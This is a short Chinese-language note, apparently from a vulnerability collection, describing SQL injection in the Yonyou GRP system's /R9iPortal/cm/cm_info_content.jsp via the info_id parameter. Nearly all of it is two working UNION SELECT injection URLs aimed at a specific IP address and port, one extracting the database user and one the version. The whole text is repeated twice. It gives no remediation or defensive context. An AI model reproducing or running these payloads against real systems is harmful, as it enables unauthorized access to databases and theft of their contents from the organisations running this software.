# 用友GRP系统sql注射 ## /R9iPortal/cm/cm_info_content.jsp 参数 info_id ``` http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,user,67,67,67,67,67,67,67,67,67,67,67-- ```  ``` http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,@@version,67,67,67,67,67,67,67,67,67,67,67-- ``` 
# 用友GRP系统sql注射 ## /R9iPortal/cm/cm_info_content.jsp 参数 info_id ``` http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,user,67,67,67,67,67,67,67,67,67,67,67-- ```  ``` http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=-8431%20UNION%20ALL%20SELECT%2067,67,@@version,67,67,67,67,67,67,67,67,67,67,67-- ``` 